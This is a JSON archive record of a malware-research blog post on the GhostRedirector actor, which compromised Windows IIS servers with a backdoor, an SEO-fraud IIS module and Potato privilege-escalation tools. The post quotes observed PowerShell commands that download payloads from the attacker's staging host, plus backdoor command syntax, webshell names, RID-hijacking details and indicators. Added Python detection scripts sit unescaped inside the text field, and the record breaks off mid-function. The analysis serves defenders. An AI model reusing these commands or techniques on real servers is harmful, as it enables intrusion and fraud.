{
	"id": "bc5013e2-af14-4de7-b634-f60d8970c107",
	"created_at": "2026-04-06T00:10:50.421897Z",
	"updated_at": "2026-04-10T13:12:21.611795Z",
	"deleted_at": null,
	"sha1_hash": "6890f97b76084593958ddc4b04bd15e6091e864e",
	"title": "GhostRedirector poisons Windows servers: Backdoors with a side of Potatoes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 885446,
	"plain_text": "GhostRedirector poisons Windows servers: Backdoors with a side\r\nof Potatoes\r\nBy Fernando Tavella\r\nArchived: 2026-04-05 14:07:53 UTC\r\nESET researchers have identified a new threat actor, whom we have named GhostRedirector, that compromised at\r\nleast 65 Windows servers mainly in Brazil, Thailand, and Vietnam. GhostRedirector used two previously\r\nundocumented, custom tools: a passive C++ backdoor that we named Rungan, and a malicious Internet\r\nInformation Services (IIS) module that we named Gamshen.\r\nWhile Rungan has the capability of executing commands on a compromised server, the purpose of Gamshen is to\r\nprovide SEO fraud as-a-service, i.e., to manipulate search engine results, boosting the page ranking of a\r\nconfigured target website. Even though Gamshen only modifies the response when the request comes from\r\nGooglebot – i.e., it does not serve malicious content or otherwise affect regular visitors of the websites –\r\nparticipation in the SEO fraud scheme can hurt the compromised host website reputation by associating it with\r\nshady SEO techniques and the boosted websites.\r\nInterestingly, Gamshen is implemented as a native IIS module – IIS (Internet Information Services) is Microsoft’s\r\nWindows web server software, which has a modular architecture supporting two types of extensions: native (C++\r\nDLL) and managed (.NET assembly). There are different types of malware that can abuse this technology; our\r\n2021 white paper Anatomy of native IIS malware provides a deep insight into the types of native IIS threats and\r\ntheir architecture. 
Gamshen falls under the category of a trojan with the main goal of facilitating SEO fraud,\r\nsimilar to IISerpent, which we documented previously.\r\nBesides Rungan and Gamshen, GhostRedirector also uses a series of other custom tools, as well as the publicly\r\nknown exploits EfsPotato and BadPotato, to create a privileged user on the server that can be used to download\r\nand execute other malicious components with higher privileges, or used as a fallback in case the Rungan backdoor\r\nor other malicious tools are removed from the compromised server. We believe with medium confidence that a\r\nChina-aligned threat actor was behind these attacks. In this blogpost we provide insight into the GhostRedirector\r\narsenal used to compromise its victims.\r\nKey points of this blogpost:\r\nWe observed at least 65 Windows servers compromised in June 2025.\r\nVictims are mainly located in Brazil, Thailand, and Vietnam.\r\nVictims are not related to one specific sector but to a variety such as insurance, healthcare, retail,\r\ntransportation, technology, and education.\r\nGhostRedirector has developed a new C++ backdoor, Rungan, capable of executing commands\r\non the victim’s server.\r\nGhostRedirector has developed a malicious native IIS module, Gamshen, that can perform SEO\r\nfraud; we believe its purpose is to artificially promote various gambling websites.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 1 of 20\n\nGhostRedirector relies on public exploits such as BadPotato or EfsPotato for privilege escalation\r\non compromised servers.\r\nBased on various factors, we conclude with medium confidence that a previously unknown,\r\nChina-aligned threat actor was behind these attacks. 
We have named it GhostRedirector.\r\nAttribution\r\nWe haven’t been able to attribute this attack to any known group; thus we coined the new name GhostRedirector to cluster all activities documented in this blogpost. These activities started in December 2024, but we were able to discover other related samples that lead us to believe that GhostRedirector has been active since at least August 2024.\r\nGhostRedirector has an arsenal that includes the passive C++ backdoor Rungan, the malicious IIS trojan Gamshen, and a variety of other utilities. We have clustered these tools together by:\r\ntheir presence on the same compromised server within the same timeframe,\r\na shared staging server, and\r\nsimilarities in the PDB paths of various GhostRedirector tools, as explained below.\r\nWe believe with medium confidence that GhostRedirector is a China-aligned threat actor, based on the following factors:\r\nmultiple samples of GhostRedirector tools have hardcoded Chinese strings,\r\na code-signing certificate issued to a Chinese company was used in the attack, and\r\none of the passwords for GhostRedirector-created users on the compromised server contains the word huang, which is Chinese for yell\u006fw.\r\nGhostRedirector is not the first known case of a China-aligned threat actor engaging in SEO fraud via malicious IIS modules. Last year, Cisco Talos published a blogpost about a China-aligned threat actor called DragonRank that conducts SEO fraud. There is some overlap in the victim geolocation (Thailand, India, and the Netherlands) and sectors (healthcare, transportation, and IT) in both attacks. However, it is likely that these were opportunistic attacks, exploiting as many vulnerable servers as possible, rather than targeting a specific set of entities. 
Besides these similarities, we don’t have any reason to believe that DragonRank and GhostRedirector are linked, so we track these activities separately.\r\nVictimology\r\nFigure 1 shows a heatmap of the affected countries, combining data from two sources:\r\nESET telemetry, where we detected these attacks between December 2024 and April 2025, and\r\nour internet-wide scan from June 2025 that we ran to get a better understanding of the scale of the attack, and that allowed us to identify additional victims.\r\nWe notified all the victims that we identified through our internet scan about the compromise.\r\nFigure 1. Countries where victims were detected\r\nWith all the collected information, we found that at least 65 Windows servers were compromised worldwide. Most of the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Note that most of the compromised servers located in the USA appear to have been rented to companies that are based in countries from the previous list. We believe that GhostRedirector was more interested in targeting victims in South America and Southeast Asia.\r\nAlso, we observed a small number of cases in:\r\nCanada,\r\nFinland,\r\nIndia,\r\nthe Netherlands,\r\nthe Philippines, and\r\nSingapore.\r\nGhostRedirector doesn’t seem to be interested in a particular vertical or sector; we have seen victims in sectors such as education, healthcare, insurance, transportation, technology, and retail.\r\nInitial access\r\nBased on ESET telemetry, we believe that GhostRedirector gains initial access to its victims by exploiting a vulnerability, probably an SQL injection flaw in a web application backed by Microsoft SQL Server. It then uses PowerShell to download various malicious tools, all from the same staging server, 868id[.]com. 
In some cases, we have seen the attackers leveraging a different living-off-the-land binary (LOLBin), certutil.exe, for the same purpose.\r\nThis conjecture is supported by our observation that most unauthorized PowerShell executions originated from the binary sqlservr.exe, the SQL Server service process. SQL Server exposes the extended stored procedure xp_cmdshell, which runs operating system commands under the SQL Server service account. It is disabled by default and has to be enabled through sp_configure, so reaching it through SQL injection requires a database login with sysadmin rights (or an application that already enabled it); both conditions are worth auditing on any internet-facing server that hosts SQL Server. Note that in Windows PowerShell, curl is an alias of Invoke-WebRequest, so the commands below are plain HTTP downloads.\r\nThe following are examples of commands that we detected being executed on the compromised servers:\r\ncmd.exe /d /s /c \" powershell curl  https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:\\ProgramData\\EfsNetAutoUser_br.exe\"\r\ncmd.exe /d /s /c \" powershell curl  http://xz.868id[.]com/EfsPotato_sign.exe -OutFile C:\\ProgramData\\EfsPotato_sign.exe\"\r\ncmd.exe /d /s /c \"powershell curl  https://xzs.868id[.]com/link.exe  -OutFile C:\\ProgramData\\link.exe\"\r\npowershell  curl  https://xzs.868id[.]com/iis/br/ManagedEngine64_v2.dll -OutFile C:\\ProgramData\\Microsoft\\DRM\\log\\ManagedEngine64.dll\r\npowershell  curl https://xzs.868id[.]com/iis/IISAgentDLL.dll -OutFile C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll\r\nWe also observed GhostRedirector installing GoToHTTP on the compromised web server after downloading it from the same staging server. GoToHTTP is a legitimate remote access tool that exposes the host through a browser-accessible session, which gives the attackers interactive access that does not depend on their custom malware.\r\nGhostRedirector used the directory C:\\ProgramData\\ to install its malware; for the C++ backdoor and the IIS trojan in particular it used the directory C:\\ProgramData\\Microsoft\\DRM\\log.\r\nAttack overview\r\nAn overview of the attack is shown in Figure 2. Attackers compromise a Windows server, then download and execute various malicious tools: a privilege escalation tool, malware that drops multiple webshells, the passive C++ backdoor Rungan, or the IIS trojan Gamshen. 
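Detection logic for the download stage described in the Initial access section, as an added example (this is not ESET's code and is not part of the original post). It takes process-creation records with Sysmon-style field names, flags shells spawned by sqlservr.exe (the xp_cmdshell path), download LOLBins (the Invoke-WebRequest aliases and certutil -urlcache), the 868id[.]com staging domain and files written under ProgramData, and runs over constructed sample events that mirror the commands quoted above. The certutil argument syntax in the second sample and the alias list are assumptions about what to watch for, not commands taken from the report.

```python
# Added example (not ESET's code): flag the xp_cmdshell -> PowerShell/certutil download chain
# over constructed process-creation records (Sysmon-style fields).
import re

BS = chr(92)  # a backslash; built from its code point so the Windows paths below need no escaping


def winpath(*parts):
    '''Join path components with backslashes (helper for the constructed sample data).'''
    return BS.join(parts)


# sqlservr.exe is the SQL Server service binary that executes xp_cmdshell; the report's
# telemetry shows most malicious PowerShell launches with this parent.
SQL_PARENTS = {'sqlservr.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe'}
# In Windows PowerShell, curl and wget are aliases of Invoke-WebRequest; certutil -urlcache is the
# other LOLBin the report names. The exact alias list is an assumption.
DOWNLOAD_RE = re.compile(
    r'(?<![a-z0-9])(invoke-webrequest|iwr|curl|wget)(?![a-z0-9])|certutil(?:[.]exe)?[^|]*-urlcache',
    re.I)
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')
STAGING_SUFFIX = '868id.com'   # staging domain from the report (defanged there as 868id[.]com)
DROP_MARKER = 'programdata'    # payloads were written under the ProgramData directory


def basename(path):
    return path.rsplit(BS, 1)[-1].lower()


def analyze(event):
    '''Return the reasons one process-creation event matches the download stage ([] if none).'''
    reasons = []
    parent = basename(event.get('parent_image', ''))
    image = basename(event.get('image', ''))
    cmdline = event.get('command_line', '')
    if parent in SQL_PARENTS and image in SHELLS:
        reasons.append('shell spawned by SQL Server (xp_cmdshell)')
    if DOWNLOAD_RE.search(cmdline):
        reasons.append('download LOLBin in command line')
        m = URL_RE.search(cmdline)
        if m and m.group(1).lower().endswith(STAGING_SUFFIX):
            reasons.append('known staging domain: ' + m.group(1))
        if DROP_MARKER in cmdline.lower():
            reasons.append('payload written under ProgramData')
    return reasons


def scan(events):
    '''Map event index -> reasons, for every event that raised at least one reason.'''
    return {i: r for i, r in ((i, analyze(e)) for i, e in enumerate(events)) if r}


# Constructed sample events (not real telemetry); the first two mirror the commands quoted above.
SQLSERVR = winpath('C:', 'Program Files', 'Microsoft SQL Server', 'MSSQL', 'Binn', 'sqlservr.exe')
POWERSHELL = winpath('C:', 'Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe')
CMD = winpath('C:', 'Windows', 'System32', 'cmd.exe')
SAMPLE_EVENTS = [
    {'parent_image': SQLSERVR, 'image': POWERSHELL,
     'command_line': 'powershell curl https://xzs.868id.com/iis/IISAgentDLL.dll -OutFile '
                     + winpath('C:', 'ProgramData', 'Microsoft', 'DRM', 'log', 'miniscreen.dll')},
    {'parent_image': SQLSERVR, 'image': CMD,
     'command_line': 'cmd.exe /d /s /c certutil -urlcache -split -f http://xz.868id.com/link.exe '
                     + winpath('C:', 'ProgramData', 'link.exe')},
    {'parent_image': SQLSERVR, 'image': CMD, 'command_line': 'cmd.exe /c dir'},
    {'parent_image': winpath('C:', 'Windows', 'explorer.exe'), 'image': POWERSHELL,
     'command_line': 'powershell -File ' + winpath('C:', 'Scripts', 'backup.ps1')},
]

if __name__ == '__main__':
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]['command_line'])
        for r in reasons:
            print('   ', r)
```

The third sample (a bare dir from SQL Server) is reported on the parent/child relationship alone; on a server where xp_cmdshell is legitimately used that single reason is noise, while the combination with a download and a write under ProgramData is not.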
The purpose of the privilege escalation tools is to create a privileged user in the Administrators group, so GhostRedirector can then leverage this account to execute privileged operations, or as a fallback in case the group loses access to the compromised server.\r\nFigure 2. Attack overview\r\nPernicious Potatoes performing privilege escalation\r\nAs part of its arsenal, GhostRedirector created several tools that perform local privilege escalation (LPE), likely based on the public EfsPotato and BadPotato exploits. Both belong to the Potato family, which abuses the SeImpersonatePrivilege right, typically held by IIS application pool identities and the SQL Server service account, to obtain a SYSTEM token; this is why code that starts as the web or database service account can go straight to creating an administrator. Almost all of the analyzed samples were obfuscated with .NET Reactor, with multiple layers of obfuscation. Some of the samples were validly signed with a code-signing certificate issued by TrustAsia RSA Code Signing CA G3 to 深圳市迪元素科技有限公司 (Shenzhen Diyuan Technology Co., Ltd.), with the thumbprint BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C; the thumbprint is a useful pivot for hunting and for blocking in application control policies.\r\nThe main goal of these samples was to create or modify a user account on the compromised server and add it to the Administrators group.\r\nDuring our analysis, we extracted from the analyzed samples the following usernames that were used in the creation of these malicious administrator users:\r\nMysqlServiceEx\r\nMysqlServiceEx2\r\nAdmin\r\nFigure 3 shows the decompiled code used by these samples to create a user after successful LPE exploitation. The password has been redacted for security purposes.\r\nFigure 3. Portion of decompiled code that creates a new user on a victim server\r\nAs seen in Figure 3, these privilege escalation tools use a custom C# class named CUserHelper. 
This class is implemented in a DLL named Common.Global.DLL (SHA-1: 049C343A9DAAF3A93756562ED73375082192F5A8), which we named Comdai and which was embedded in the analyzed samples. We believe that Comdai was created by the same developers as the rest of the GhostRedirector arsenal, based on the shared pattern in their respective PDB paths: see the repeated x5 substring in Table 1, which is shared between Rungan, Gamshen, and the privilege escalation tools.\r\nTable 1. PDB strings collected from GhostRedirector tools\r\nSample SHA-1 | Sample type | PDB\r\n049C343A9DAAF3A93756562ED73375082192F5A8 | Comdai library | F:\\x5\\netTools\\oMain\\Common.Global\\obj\\Release\\Common.Global.pdb\r\n28140A5A29EBA098BC6215DDAC8E56EACBB29B69 | Rungan, C++ backdoor | F:\\x5\\AvoidRandomKill-main\\x64\\Release\\IISAgentDLL.pdb\r\n871A4DF66A8BAC3E640B2D1C0AFC075BB3761954 | Gamshen, IIS trojan | F:\\x5\\AvoidRandomKill-main\\Release\\ManagedEngine64.pdb\r\n371818BDC20669DF3CA44BE758200872D583A3B8 | Tool to create a new user | E:\\x5\\netTools\\WinSystem\\obj\\Release\\uedit32_sign.pdb\r\nTable 2 provides an overview of the important classes implemented in Comdai that are used by GhostRedirector’s various privilege escalation tools, along with a description of each class’s behavior. Note the ExeHelper class, which provides a function to execute a file named link.exe; GhostRedirector used the same filename to deploy the GoToHTTP tool.\r\nAlso note the backdoor-like capabilities, including network communication, file execution, directory listing, and manipulating services and Windows registry keys. While we haven’t observed these methods being used by any known GhostRedirector components, this shows that Comdai is a versatile tool that can support various stages of the attack.\r\nTable 2. Classes implemented in Comdai\r\nC# class | Description\r\nAES | Encrypts/decrypts data with AES in ECB mode. Key: 030201090405060708091011121315. ECB with a hardcoded key means anything the tool protects this way can be decrypted offline once the key is recovered from the binary.\r\nCUserHelper | Lists users on a compromised server. Creates a user with specified credentials and adds it to a group also specified by an argument; by default it uses the Administrators group.\r\nExeHelper | Used to execute a binary named link.exe. This name was used by the attackers for the GoToHTTP binary.\r\nHttpHelper | Performs GET and POST requests, for an unknown purpose, to a hardcoded URL: https://www.cs01[.]shop.\r\nMsgData | Contains only attributes; used by the class NodejsTX to deserialize a JSON object.\r\nMyDll | Invokes methods from an unknown DLL named MyDLL.dll.\r\nNodejsTX | Provides a method to communicate with another malicious component via a named pipe, salamander_pipe, which can receive parameters to create a specified user who is then added to the Administrators group. This user creation is achieved by invoking a method from the CUserHelper class.\r\nRegeditHelper | Contains a method for reading the value of a specified Windows registry key.\r\nScanfDirectory | Contains methods for listing the contents of a specified directory.\r\nServiceHelper | Contains methods to restart a specified service.\r\nSystemHelper | Contains methods to execute a binary or execute commands via the ProcessStartInfo class. 
The binary or commands are provided to ProcessStartInfo as arguments.\r\nUserStruct | Contains only attributes: username (string) and Groups (list\u003cstring\u003e). The attributes are used by the CUserHelper class for listing users.\r\nSome exceptions to the rule\r\nWe discovered a sample (SHA-1: 21E877AB2430B72E3DB12881D878F78E0989BB7F) using the same certificate, uploaded to VirusTotal in August 2024, which we believe is related to GhostRedirector’s arsenal, although we didn’t see it used during this campaign. This assumption is based on the behavior of the sample, which tries to open a text file and send its contents to a hardcoded URL. For this, the sample contains an embedded Comdai DLL and invokes the Comdai C# class HttpHelper, whose hardcoded URL is https://www.cs01[.]shop, the same domain mentioned in Table 2.\r\nWe also discovered some privilege escalation tools that differ slightly from the behavior described above.\r\nFor example, in one case (SHA-1: 5A01981D3F31AF47614E51E6C216BED70D921D60), instead of creating a new user, the tool changes the password of the existing Guest account to one hardcoded in the malware and then attempts to give that account administrator rights through RID hijacking, i.e., by editing the account’s entry under HKLM\\SAM so that its relative identifier (RID) becomes 500, the RID of the built-in Administrator. A practitioner checking for this should note that a hijacked account does not show up as a member of the Administrators group; the SAM entry itself has to be inspected.\r\nIn another case (SHA-1: 9DD282184DDFA796204C1D90A46CAA117F46C8E1), the tool not only creates a new administrator user but also installs multiple webshells on a specific path on the victim’s server, provided manually by GhostRedirector as an argument to the tool.\r\nThese webshells are embedded in the resources of the sample in cleartext, and the names are hardcoded; the names we saw used are:\r\nC1.php\r\nCmd.aspx\r\nError.aspx\r\nK32.asxp\r\nK64.aspx\r\nLandGrey.asp\r\nZunput, a website information collector plus webshell dropper\r\nAnother interesting tool used by 
GhostRedirector had the filename SitePuts.exe. This sample (SHA‑1: EE22BA5453ED577F8664CA390EB311D067E47786), which we named Zunput, is also developed with the .NET Framework and signed with the certificate mentioned above; it reads the IIS configuration system looking for configured websites and obtains the following information about them:\r\nphysical path on the server,\r\nname, and\r\nfor each of the site’s bindings:\r\n○ protocol,\r\n○ IP address, and\r\n○ hostname.\r\nOnce the information is collected, Zunput checks for the existence of the physical path on the server, and also verifies that the directory contains at least one file with the .php, .aspx, or .asp extension. This way, Zunput only targets active websites capable of executing dynamic content; only in those directories does it then drop the embedded webshells. The webshells are embedded in the resources of the sample, and for the timestamps of each dropped webshell (creation, modification, and last access) the malware copies the timestamps of an existing file in the directory, so the new files do not stand out in a listing sorted by date (timestomping).\r\nWebshells are written in ASP, PHP, and JavaScript, and the names used are selected randomly from the following list:\r\nXml\r\nAjax\r\nSync\r\nLoadapi\r\nLoadhelp\r\nCode\r\nJsload\r\nLoadcss\r\nLoadjs\r\nPop3\r\nImap\r\nApi\r\nExtensions used for the webshells:\r\n.cer\r\n.pjp\r\n.asp\r\n.aspx\r\nNote that .cer is not a scripting extension by name; it is a common webshell choice because some IIS configurations map it to the ASP.NET handler, so the file executes server-side while looking like a certificate to a casual reviewer.\r\nInformation collected during Zunput execution is saved in a file named log.txt (see an example in Figure 4) in the directory from which it was executed. This information isn’t exfiltrated automatically by Zunput, but it can be obtained by the attackers through several methods; one of them is the deployed webshells mentioned above.\r\nFigure 4. 
Example of saved content of log.txt, where 分割线 machine translates to Dividing line\r\nThe final payloads\r\nRungan, a passive C++ backdoor\r\nRungan (SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69) is a passive C/C++ backdoor that we have seen installed in C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll. Passive here means that it never beacons out: it only reacts to requests that reach it, so there is no outbound C\u0026C traffic to catch at the network edge.\r\nThis backdoor uses AES in CBC mode for string decryption. The same 16 bytes, 030201090405060708090A0B0C0D0E0F, are used for both the key and the IV, and based on the malware’s PDB path F:\\x5\\AvoidRandomKill-main\\x64\\Release\\IISAgentDLL.pdb, we believe that GhostRedirector reuses the AES implementation from the AvoidRandomKill repository.\r\nThe main functionality of this backdoor is to register a plaintext hardcoded URL, http://+:80/v1.0/8888/sys.html, with HTTP.sys through the HTTP Server API (HttpInitialize and HttpAddUrl). HTTP.sys then routes any request for that path on port 80 to Rungan’s own request queue instead of IIS, so the backdoor shares the web server’s port without opening a new listening socket, and these requests never enter the IIS pipeline (and therefore are not seen by IIS modules or recorded in the site’s IIS logs). A defender can list every URL registered with HTTP.sys on the host with netsh http show servicestate and compare the result against the configured IIS bindings. The backdoor then waits for a request that matches that URL, and parses and executes the received commands on the compromised server.\r\nAdditional URLs can be set in an optional configuration file named C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\vbskui.dll (a configuration file despite the .dll extension). Rungan will listen to all incoming requests matching the configured patterns, and the configuration can be updated via a backdoor command. To activate the backdoor, any incoming HTTP request must contain a specific combination of parameters and values, which are hardcoded in Rungan.\r\nOnce this check is met, Rungan uses the parameter action to determine the backdoor command, and uses the data in the HTTP request body as the command parameters. 
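Rogue administrator accounts are the common thread of the Potato tools, Comdai's CUserHelper and Rungan's mkuser command (Table 3): all end in a NetUserAdd call followed by a group addition. The following correlation over Windows Security events is an added example (not ESET's code and not part of the original post). It pairs account creation (event 4720) with addition to Administrators (event 4732) on the same SID inside a short window, flags the usernames reported above, and separately flags a password reset of the Guest account (event 4724), which is what the RID-hijacking variant leaves behind. The event records are constructed; the field names follow the Security log EventData schema, and the five-minute window is an assumption.

```python
# Added example (not ESET's code): correlate Security events 4720/4732/4724 to surface rogue
# local administrators created by the Potato tools, Comdai or Rungan. Records are constructed.
KNOWN_NAMES = {'mysqlserviceex', 'mysqlserviceex2', 'admin'}  # usernames reported for GhostRedirector
ADMIN_GROUPS = {'administrators'}
WINDOW_SECONDS = 300  # assumption: creation followed by elevation within 5 minutes is one action


def find_rogue_admins(events):
    '''Return findings as (kind, account, detail) tuples, in event time order.

    Each event is a dict with an integer time (seconds), the event id and an EventData-style
    fields dict: 4720 carries TargetUserName/TargetSid, 4732 carries MemberSid and the group
    name in TargetUserName, 4724 carries the TargetUserName whose password was reset.
    '''
    findings = []
    created = {}  # TargetSid -> (time, username), taken from 4720 events
    for ev in sorted(events, key=lambda e: e['time']):
        f = ev['fields']
        if ev['id'] == 4720:
            name = f['TargetUserName']
            created[f['TargetSid']] = (ev['time'], name)
            if name.lower() in KNOWN_NAMES:
                findings.append(('known-name', name, 'username used by GhostRedirector tools'))
        elif ev['id'] == 4732 and f['TargetUserName'].lower() in ADMIN_GROUPS:
            sid = f['MemberSid']
            if sid in created:
                t0, name = created[sid]
                age = ev['time'] - t0
                if age <= WINDOW_SECONDS:
                    findings.append(('create-then-elevate', name,
                                     'created and added to ' + f['TargetUserName'] + ' within '
                                     + str(age) + 's by ' + f['SubjectUserName']))
        elif ev['id'] == 4724 and f['TargetUserName'].lower() == 'guest':
            findings.append(('guest-password-reset', 'Guest',
                             'possible RID hijacking; account will not appear in Administrators'))
    return findings


# Constructed sample log (not real telemetry); SIDs, subjects and times are illustrative.
SAMPLE_EVENTS = [
    {'time': 1000, 'id': 4720, 'fields': {'TargetUserName': 'MysqlServiceEx',
                                          'TargetSid': 'S-1-5-21-1-2-3-1005', 'SubjectUserName': 'SRV01$'}},
    {'time': 1002, 'id': 4732, 'fields': {'TargetUserName': 'Administrators',
                                          'MemberSid': 'S-1-5-21-1-2-3-1005', 'SubjectUserName': 'SRV01$'}},
    {'time': 5000, 'id': 4720, 'fields': {'TargetUserName': 'svc_backup',
                                          'TargetSid': 'S-1-5-21-1-2-3-1006', 'SubjectUserName': 'jdoe'}},
    {'time': 7000, 'id': 4724, 'fields': {'TargetUserName': 'Guest', 'SubjectUserName': 'SRV01$'}},
    {'time': 90000, 'id': 4732, 'fields': {'TargetUserName': 'Administrators',
                                           'MemberSid': 'S-1-5-21-1-2-3-1006', 'SubjectUserName': 'jdoe'}},
]

if __name__ == '__main__':
    for kind, account, detail in find_rogue_admins(SAMPLE_EVENTS):
        print(kind, account, detail, sep=' | ')
```

The svc_backup account in the sample is created and elevated a day apart and is deliberately not reported; the window is what separates an automated create-and-elevate tool from ordinary administration. Because the RID-hijacked Guest never produces a 4732, the 4724 check is the only event-log signal for that variant.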
No encryption or encoding is used in the C\u0026C protocol, so the action parameter and the command body travel in cleartext over port 80 and can be inspected by any network sensor or reverse proxy in front of the server.\r\nThe most notable capabilities are creating a new user or executing commands on the victim’s server; a full list of backdoor commands is shown in Table 3.\r\nTable 3. Rungan backdoor commands\r\nParameter (action) | Body | Description | Response\r\nmkuser | user=\u003cUSERNAME\u003e\u0026pwd=\u003cPASSWORD\u003e\u0026groupname=\u003cGROUPNAME\u003e | Creates the specified user on the compromised server using the NetUserAdd Windows API. | Status code of the operation.\r\nlistfolder | path=\u003cA_PATH\u003e | This looks unfinished: it collects information from the selected path but doesn’t exfiltrate it. | N/A\r\naddurl | url=\u003cURL_1\u003e|\u003cURL_2\u003e (pipe-separated) | Registers URLs the backdoor will listen on; more than one can be given, separated with |. The URL is also added to the configuration file. | If a URL fails to register, the response is Failed: \u003cURL\u003e, otherwise All Ok.\r\ncmd | cmdpath=\u003cCMD_PATH\u003e\u0026mingl=\u003cCOMMAND_TO_EXECUTE\u003e | Executes a command on the victim’s server using pipes and the CreateProcessA API. | Command output.\r\nFigure 5 and Figure 6 show different examples of requests made to the malware during a dynamic analysis using the tool Postman in a simulated environment.\r\nFigure 5. Executing commands on a testing server\r\nFigure 6. Adding a user through the malware on a testing server\r\nGamshen, malicious IIS module\r\nDeveloped as a C/C++ DLL, Gamshen is a malicious native IIS module. 
The main functionality of this malware is to intercept requests made to the compromised server by the Googlebot search engine crawler and, only in that case, modify the legitimate response of the server. The response is modified based on data requested dynamically from Gamshen’s C\u0026C server. By doing this, GhostRedirector attempts to manipulate the Google search ranking of a specific, third-party website, using manipulative, shady SEO techniques such as creating artificial backlinks from the legitimate, compromised website to the target website. We previously documented a case of an IIS trojan using similar tactics: see IISerpent: Malware-driven SEO fraud as a service.\r\nIt's important to mention that a regular user who visits the affected website wouldn’t see any changes and would not be affected by the malicious behavior, because Gamshen doesn’t trigger any of its malicious activity on requests from regular visitors. Two consequences follow for defenders. First, the compromise is invisible to a normal browser check; to reproduce it, the site has to be fetched with a Googlebot User-Agent (or inspected with Google Search Console) and the response compared with a normal fetch. Second, serving crawlers different content from what users see is cloaking, which search engines penalize, so the compromised site risks losing its own ranking in addition to lending it to the attacker’s target. Note also that the filter described below accepts requests whose Referer header contains google.com, so a visitor who reaches a matching URL by clicking a Google result satisfies the crawler check as well.\r\nFigure 7 shows how a malicious module participating in the IIS SEO fraud scheme modifies the legitimate response of a compromised server when a request is made from the Google crawler, aka Googlebot.\r\nFigure 7. Overview of an SEO fraud scheme\r\nIn order to do this, the attackers have implemented their own malicious code for the following IIS event handlers:\r\nOnBeginRequest\r\nOnPreExecuteRequestHandler\r\nOnPostExecuteRequestHandler\r\nOnSendResponse\r\nWhen the compromised server receives an HTTP request, the request goes through the IIS request processing pipeline, which triggers these handlers at various steps of the process; notably, the OnSendResponse handler is triggered just before the HTTP response is sent out by the compromised server. 
Since Gamshen is installed as an\r\nIIS module, it automatically intercepts each incoming HTTP request at these steps, and performs three actions.\r\nFirst, it performs a series of validations to filter only HTTP requests of interest:\r\nThe request must originate from a Google crawler: either the User-Agent header contains the string\r\nGooglebot, or the Referer contains the string google.com.\r\nThe HTTP method must not be POST.\r\nThe requested resource is not an image, stylesheet, or similar static resource, i.e., it doesn’t have any of the\r\nfollowing extensions: .jpg, .resx, .png, .jpeg, .bmp, .gif, .ico, .css, or .js. This is likely to avoid breaking UI\r\nfunctionality.\r\nThe URL must contain the string android_ or match any of the following regular expressions:\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)_([0-9_]{6,20})(/|\\\\.\\\\w+)?\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})\\\\/([a-zA-Z0-9_]{6,20})\r\n(/|\\\\.\\\\w+)?\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\/([0-9_]{6,20})(/|\\\\.\\\\w+)?\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\/([a-zA-Z]{8,10})(/|\\\\.\\\\w+)?\r\n○ [/]?([a-zA-Z0-9]{6,8})\\\\/([a-zA-Z0-9]{6,8})(/|\\\\.phtml|\\\\.xhtml|\\\\.phtm|\\\\.shtml)\r\n○ [/]?([a-zA-Z0-9_]{14})(/|\\\\.html|\\\\.htm)\r\n○ [/]?([a-zA-Z0-9]{6})\\\\/([a-zA-Z0-9]{8})(/|\\\\.html|\\\\.htm)\r\n○ [/]?([a-z0-9]{6})\\\\.xhtml\r\nSecond, Gamshen modifies the response intended for the search engine crawler with data obtained from its own\r\nC\u0026C server, brproxy.868id[.]com. We have observed three URLs being used for this purpose:\r\nhttps://brproxy.868id[.]com/index_base64.php?\u003cORIGINAL_URL\u003e\r\nhttps://brproxy.868id[.]com/tz_base64.php?\u003cORIGINAL_URL\u003e\r\nhttps://brproxy.868id[.]com/url/index_base64.php\r\nIn all cases, the following hardcoded User-Agent string is used: Mozilla/5.0 (compatible; Googlebot/2.1;\r\n+http://www.google.com/bot.html). 
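To make the filter above testable, here is a reimplementation of Gamshen's request checks in Python, added as an example (not Gamshen's or ESET's code). The eight regular expressions are transcribed with the escaped dot and word class rewritten as plain character classes, the crawler, method, static-extension and URL checks are applied in the order listed, and the function is run over constructed requests. Unanchored, case-sensitive matching and applying the URL checks to the path alone are assumptions, since the report does not state them.

```python
# Added example (not Gamshen's or ESET's code): the request filter described above, in Python.
import re

KEYWORDS = 'android|plays|articles|details|iosapp|topnews|joga'
ANY_EXT = '(/|[.][A-Za-z0-9_]+)?'  # trailing slash or any extension (the report shows C++ escapes)
# The eight patterns listed above, with the escaped dot written as [.] and the word class spelled out.
URL_PATTERNS = [re.compile(p) for p in (
    '[/]?(' + KEYWORDS + ')_([0-9_]{6,20})' + ANY_EXT,
    '[/]?(' + KEYWORDS + ')_([a-zA-Z0-9_]{6,8})/([a-zA-Z0-9_]{6,20})' + ANY_EXT,
    '[/]?(' + KEYWORDS + ')/([0-9_]{6,20})' + ANY_EXT,
    '[/]?(' + KEYWORDS + ')/([a-zA-Z]{8,10})' + ANY_EXT,
    '[/]?([a-zA-Z0-9]{6,8})/([a-zA-Z0-9]{6,8})(/|[.]phtml|[.]xhtml|[.]phtm|[.]shtml)',
    '[/]?([a-zA-Z0-9_]{14})(/|[.]html|[.]htm)',
    '[/]?([a-zA-Z0-9]{6})/([a-zA-Z0-9]{8})(/|[.]html|[.]htm)',
    '[/]?([a-z0-9]{6})[.]xhtml',
)]
STATIC_EXTS = ('.jpg', '.resx', '.png', '.jpeg', '.bmp', '.gif', '.ico', '.css', '.js')


def is_crawler(headers):
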